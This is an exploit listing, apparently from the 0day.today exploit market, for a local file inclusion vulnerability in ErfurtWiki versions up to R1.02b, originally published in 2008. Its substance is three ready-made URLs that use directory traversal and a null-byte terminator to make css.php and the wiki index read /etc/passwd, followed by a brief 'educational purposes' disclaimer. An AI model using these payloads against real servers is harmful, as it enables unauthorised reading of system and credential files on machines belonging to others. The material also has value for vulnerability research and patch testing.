[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities

Author
Unohope
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3144
Category
web applications
Date add
09-06-2008
Platform
unsorted
===============================================================
ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities
===============================================================



  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 


                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|



Title =======:: ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerability

ScriptName ==:: ErfurtWiki

Download ====:: http://erfurtwiki.sourceforge.net/downloads/ewiki-R1.02b.tgz

______________________
[Local File Inclusion]

- {css.php} -

http://localhost/ewiki/fragments/css.php?ewiki_id=../../../../../../../../etc/passwd%00&ewiki_action=1

http://localhost/ewiki/?id=../../../../../../../../../../../../etc/passwd%00

http://localhost/ewiki/fragments/css.php?ewiki_id=1&ewiki_action=../../../../../../../../etc/passwd%00

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!




#  0day.today [2024-11-16]  #